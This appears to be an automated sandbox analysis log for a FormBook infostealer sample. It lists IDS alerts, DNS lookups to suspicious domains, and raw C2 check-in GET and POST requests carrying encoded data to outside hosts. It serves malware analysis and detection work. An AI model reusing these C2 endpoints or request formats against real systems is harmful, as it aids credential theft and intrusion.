Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50008 -> 194.245.148.189:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50008 -> 194.245.148.189:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50010 -> 208.91.197.27:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50004 -> 194.9.94.86:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50004 -> 194.9.94.86:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49999 -> 112.175.247.179:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49999 -> 112.175.247.179:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50006 -> 194.245.148.189:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49987 -> 209.74.79.41:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49985 -> 134.122.133.80:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49985 -> 134.122.133.80:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50002 -> 194.9.94.86:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49998 -> 112.175.247.179:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50001 -> 194.9.94.86:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49994 -> 104.21.112.1:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50007 -> 194.245.148.189:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50013 -> 76.223.67.189:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49989 -> 209.74.79.41:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50012 -> 208.91.197.27:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50012 -> 208.91.197.27:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50005 -> 194.245.148.189:80
                Source: DNS query: www.winningpath.xyz
                Source: DNS query: www.apptj7.xyz
Source: Joe Sandbox View | IP Address: 194.9.94.86
Source: Joe Sandbox View | IP Address: 104.21.112.1
Source: Joe Sandbox View | ASN Name: LOOPIASE
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | ASN Name: MULTIBAND-NEWHOPEUS
Source: Joe Sandbox View | ASN Name: CSLDE
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (15 occurrences)
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_005322EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_005322EE
                Source: global trafficHTTP traffic detected: GET /ah2l/?nzs0T2=0XIysXmjicdWgm2GWI+Thi8VIPF50KgCrB9qe1pxW9F6KmTtpKViQSnjO8JFZFRtQOT2SKyqDZIyiHstHNrbonPRFLzX8YNbLN93hXWxhTtjpF1XokGMpx8sFq4HkBm76WFwIOg=&mLFl=BXYPt2lXBpi8Dj HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.jrcov55qgcxp5fwa.topConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.2; LG-D722 Build/LRX22G.A1429531854) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/34.0.1847.118 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /4p8s/?mLFl=BXYPt2lXBpi8Dj&nzs0T2=sbo6CbF7xq9vaRi3YzuXiH7G7PCaul9K2GcB+IL1+35GAWVPgulqGeXZ6bn3jQiNs+qV6ADqYtqo2KT+0SDqdopb2qyXeoTz6pIh8vt4eZWlyhEkc4Yu1dj816xA9fmF7Yf8BYw= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.winningpath.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.2; LG-D722 Build/LRX22G.A1429531854) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/34.0.1847.118 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /qzi3/?nzs0T2=ZstwWiqc2nBlehIthXm/ZN/AUPsgXrD51lhdEOCLGCvwhgyybv3tjhbgBMsRsRSNQM92qNeXuPeIY/BunbCcNNF518/3bUb+8prHuu4wGUKr0baD/E+zEK5A15FFaZBXoYSAzP4=&mLFl=BXYPt2lXBpi8Dj HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.buyspeechst.shopConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.2; LG-D722 Build/LRX22G.A1429531854) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/34.0.1847.118 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /44mq/?nzs0T2=foyEanxfLfFujag6PZWyCDygORHT/b7ZEbPS/LApOdHxGUo+oiUz5nR/Y3bTUTystoAVEPBhAuIJq0FzLvmkL65YpPHBdFMnQ+RN4nJ4f0YiJMRNqIhlsXwKcwXCFylpIZyPQ/A=&mLFl=BXYPt2lXBpi8Dj HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.dodowo.shopConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.2; LG-D722 Build/LRX22G.A1429531854) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/34.0.1847.118 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /oqbp/?nzs0T2=nVdj0w1j4FwXyGo+Obq+FyeO6yYPj1Biv/jBCQDtLkRj70mDH/TDAXa41L+hW2L/B4b9RwzGZeA1aKeiLPIgFZPHXdsTU40dEdaTH5HUY4e23s7HRqJoCIa7IuMIjt9j0jZPQBo=&mLFl=BXYPt2lXBpi8Dj HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.milp.storeConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.2; LG-D722 Build/LRX22G.A1429531854) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/34.0.1847.118 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /89qa/?mLFl=BXYPt2lXBpi8Dj&nzs0T2=0pCqxWaHoeLxNwZtE4rbCif976qK0EABSkz9gYzxYmn//CJHUgPOWYHQR+claPVZDeQXO3fZA6HYGFtXbggvb1fmL/sutHarBSn3QusyefFvRxXanRf+9ESPTUwnwk3mbGErQuw= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.did-ready.infoConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.2; LG-D722 Build/LRX22G.A1429531854) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/34.0.1847.118 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /sdkp/?mLFl=BXYPt2lXBpi8Dj&nzs0T2=Q2+U6NJof87KeL/xy+i0CIZPloZmzWZffj5EOQwXnkLhXENSPXaDW5SWGBVddIYwsB7Goe8a5E1AtdXY7h1Pcmgoj2AAtURgmOzcQSlReXoBGqrKsD90xFxRspg0pw2NsQGlTC8= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.deacapalla.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.2; LG-D722 Build/LRX22G.A1429531854) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/34.0.1847.118 Mobile Safari/537.36
                Source: global traffic
                DNS traffic detected: DNS query: www.1337street.shop
                Source: global traffic
                DNS traffic detected: DNS query: www.mosquitoxp.lol
                Source: global traffic
                DNS traffic detected: DNS query: www.clubhoodies.shop
                Source: global traffic
                DNS traffic detected: DNS query: www.jrcov55qgcxp5fwa.top
                Source: global traffic
                DNS traffic detected: DNS query: www.winningpath.xyz
                Source: global traffic
                DNS traffic detected: DNS query: www.buyspeechst.shop
                Source: global traffic
                DNS traffic detected: DNS query: www.dodowo.shop
                Source: global traffic
                DNS traffic detected: DNS query: www.milp.store
                Source: global traffic
                DNS traffic detected: DNS query: www.did-ready.info
                Source: global traffic
                DNS traffic detected: DNS query: www.vipstargold.buzz
                Source: global traffic
                DNS traffic detected: DNS query: www.deacapalla.online
                Source: global traffic
                DNS traffic detected: DNS query: www.thomet.net
                Source: global traffic
                DNS traffic detected: DNS query: www.apptj7.xyz
                Source: global traffic
                DNS traffic detected: DNS query: www.infovea.tech
                Source: unknown
                HTTP traffic detected: POST /4p8s/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    Host: www.winningpath.xyz
                    Origin: http://www.winningpath.xyz
                    Referer: http://www.winningpath.xyz/4p8s/
                    Cache-Control: max-age=0
                    Content-Type: application/x-www-form-urlencoded
                    Connection: close
                    Content-Length: 211
                    User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; LG-D722 Build/LRX22G.A1429531854) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/34.0.1847.118 Mobile Safari/537.36
                    Data Raw: 6e 7a 73 30 54 32 3d 68 5a 41 61 42 72 78 78 31 4b 46 50 4e 68 65 46 43 78 44 51 69 45 4c 47 67 75 36 66 78 47 4a 68 6d 6c 55 32 31 49 4c 35 30 44 73 32 41 6c 4e 34 75 4d 38 2b 43 4d 57 6f 35 6f 75 4d 69 68 61 70 73 35 32 68 2b 51 7a 4a 56 4e 32 4c 37 4a 4f 79 69 77 58 4c 64 35 56 58 75 71 2b 79 57 74 7a 6b 30 74 45 36 35 50 56 48 51 4b 69 4b 33 43 78 5a 4a 59 52 52 38 38 76 4a 72 37 73 57 6a 75 75 6c 37 66 57 72 5a 34 43 63 77 2f 63 7a 44 31 35 64 6a 2b 61 53 7a 46 4c 75 72 61 74 6d 6f 5a 63 44 66 65 51 34 4e 72 54 70 4f 35 61 50 67 76 50 4d 46 34 73 42 43 2f 42 31 56 37 51 76 38 74 2f 57 4c 71 50 6c 50 4c 55 71 6d 73 66 62
                    Data Ascii: nzs0T2=hZAaBrxx1KFPNheFCxDQiELGgu6fxGJhmlU21IL50Ds2AlN4uM8+CMWo5ouMihaps52h+QzJVN2L7JOyiwXLd5VXuq+yWtzk0tE65PVHQKiK3CxZJYRR88vJr7sWjuul7fWrZ4Ccw/czD15dj+aSzFLuratmoZcDfeQ4NrTpO5aPgvPMF4sBC/B1V7Qv8t/WLqPlPLUqmsfb
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                    Content-Length: 548
                    Content-Type: text/html
                    Date: Fri, 10 Jan 2025 19:48:54 GMT
                    Server: nginx
                    X-Cache: BYPASS
                    Connection: close
                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 19:49:10 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 19:49:13 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 19:49:15 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 19:49:18 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 19:49:24 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yr537pJa80uD7vS8N5O%2BQqLW%2BhqzOMpDZF8PyFaPUKIXAj8eVc9eBAl6QZknnpRsyyr%2Bf8mhOFG6%2F82Hp1kHR9vArBt2kEw%2F4OjxRrWVDrXyCkb054B5s%2BgpqzFMhmLUerI4YN%2BOEg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fff30a87f1e0f5b-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1635&min_rtt=1635&rtt_var=817&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=848&delivery_rate=0&cwnd=219&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 65 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 6e c2 30 10 44 ef fe 8a 2d 77 b2 01 71 e8 61 65 a9 25 41 45 0a 34 6a cd 81 a3 c1 5b 19 89 c6 c6 de 34 e2 ef ab 04 55 ea 75 e6 cd 68 86 9e aa f7 b5 39 b6 35 bc 99 5d 03 ed e1 b5 d9 ae 61 36 47 dc d6 66 83 58 99 ea e1 2c 8b 12 b1 de cf b4 22 2f df 57 4d 9e ad d3 8a e4 22 57 d6 ab 72 05 fb 20 b0 09 7d e7 08 1f a2 22 9c 20 3a 05 77 1f 73 0b fd 8f f1 0b ad 28 6a e3 19 12 df 7a ce c2 0e 0e 1f 0d 0c 36 43 17 04 be 46 0e 42 07 e2 2f 19 32 a7 1f 4e 05 61 1c 9b 92 56 64 9d 4b 9c b3 7e 89 f6 ec 19 3e 27 00 ac c0 30 0c c5 a9 bf e7 c8 7c f6 59 8a ec 43 84 36 24 81 e7 92 f0 2f a6 08 a7 5d 84 d3 9f 5f 00 00 00 ff ff e3 02 00 2b bb 83 fa 0a 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e3Ln0D-wqae%AE4j[4Uuh95]a6GfX,"/WM"Wr }" :ws(jz6CFB/2NaVdK~>'0|YC6$/]_+0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 19:49:26 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pzVcWSeeme6ttx0wfXPh57EmL0xkBVRfl8OFbe63aaWYakdL7xMSY7oF%2FNL15I2jzBiE0Ak%2FcJ380fSnsJRb%2FApe6D3Sj%2BZo8N6FicQpmQJ19vAJFO8xB0r3r9OL%2Bceu%2BRcNlk5zDw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fff30b87b550f5b-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1647&min_rtt=1647&rtt_var=823&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=872&delivery_rate=0&cwnd=219&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 6e c2 30 10 44 ef fe 8a 2d 77 b2 01 71 e8 61 65 a9 25 41 45 0a 34 6a cd 81 a3 c1 5b 19 89 c6 c6 de 34 e2 ef ab 04 55 ea 75 e6 cd 68 86 9e aa f7 b5 39 b6 35 bc 99 5d 03 ed e1 b5 d9 ae 61 36 47 dc d6 66 83 58 99 ea e1 2c 8b 12 b1 de cf b4 22 2f df 57 4d 9e ad d3 8a e4 22 57 d6 ab 72 05 fb 20 b0 09 7d e7 08 1f a2 22 9c 20 3a 05 77 1f 73 0b fd 8f f1 0b ad 28 6a e3 19 12 df 7a ce c2 0e 0e 1f 0d 0c 36 43 17 04 